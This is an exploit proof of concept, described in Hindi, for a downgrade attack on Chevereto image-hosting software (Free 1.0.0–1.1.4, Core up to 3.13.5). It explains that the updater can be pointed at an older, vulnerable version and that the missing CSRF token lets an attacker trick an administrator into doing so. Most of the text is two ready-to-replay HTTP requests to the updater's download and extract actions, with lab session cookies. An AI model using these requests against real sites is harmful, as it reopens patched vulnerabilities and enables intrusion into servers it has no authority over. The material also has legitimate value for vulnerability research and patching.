
Chevereto डाउनग्रेड हमला - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core
Chevereto डाउनग्रेड हमला – 1.0.0–1.1.4 मुफ्त, <= 3.13.5 कोर. एक व्यवस्थापक उपयोगकर्ता अपडेटर स्क्रिप्ट को अपग्रेड के बजाय किसी अन्य संस्करण में डाउनग्रेड करने का निर्देश दे सकता है, जिससे पिछली कमज़ोरियाँ पुनः प्रस्तुत हो जाती हैं। CSRF टोकन की कमी के कारण इस हमले का उपयोग CSRF हमले में भी किया जा सकता है, जिसका अर्थ है कि किसी व्यवस्थापक उपयोगकर्ता को यह कार्य करने के लिए धोखा दिया जा सकता है।
सर्वर डाउनलोड की गई फ़ाइल का पूरा फ़ाइल नाम लौटाएगा, जिसका उपयोग अगले अनुरोध में किया जाएगा
GET /update/?action=download&version=3.13.4 HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1
GET /update/?action=extract&file=chevereto_3.13.4_3e50e6fa70915cd22849819f.zip HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1